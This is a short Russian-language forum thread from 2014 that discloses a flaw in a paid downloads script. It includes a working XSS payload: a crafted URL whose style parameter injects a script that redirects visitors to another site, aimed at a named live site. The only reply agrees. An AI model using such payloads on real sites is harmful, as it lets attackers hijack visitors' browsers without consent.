Visavi.net
Светлая
Темная
Уязвимость SEA Downoloads
Форум
Разработка сайта
Безопасность и защита сайтов
Уязвимость SEA Downoloads
Печать
RSS
382
V
VITAMIN
08.12.2014 / 14:28
Автор
Пришелец
0
Собственно платный движек:
http://wapinet.ru/buy_php_scripts
Пример:
http://sea.wapinet.ru/
Уязвимость:
http://sea.wapinet.ru/?url=somebody.com&style=sea.wapinet.ru/style/style.css"><script>location.href="//visavi.net";</script>
Если хотя бы раз подключить юзера к этому линку,то при переходе на
http://sea.wapinet.ru
его будет бросать на
http://visavi.net
В
Влад
08.12.2014 / 15:00
Пацак
0
Точняк
Для выполнения действия необходимо авторизоваться!
Стикеры
/
Теги
/
Правила
/
Топ тем
/
Топ постов
/
Поиск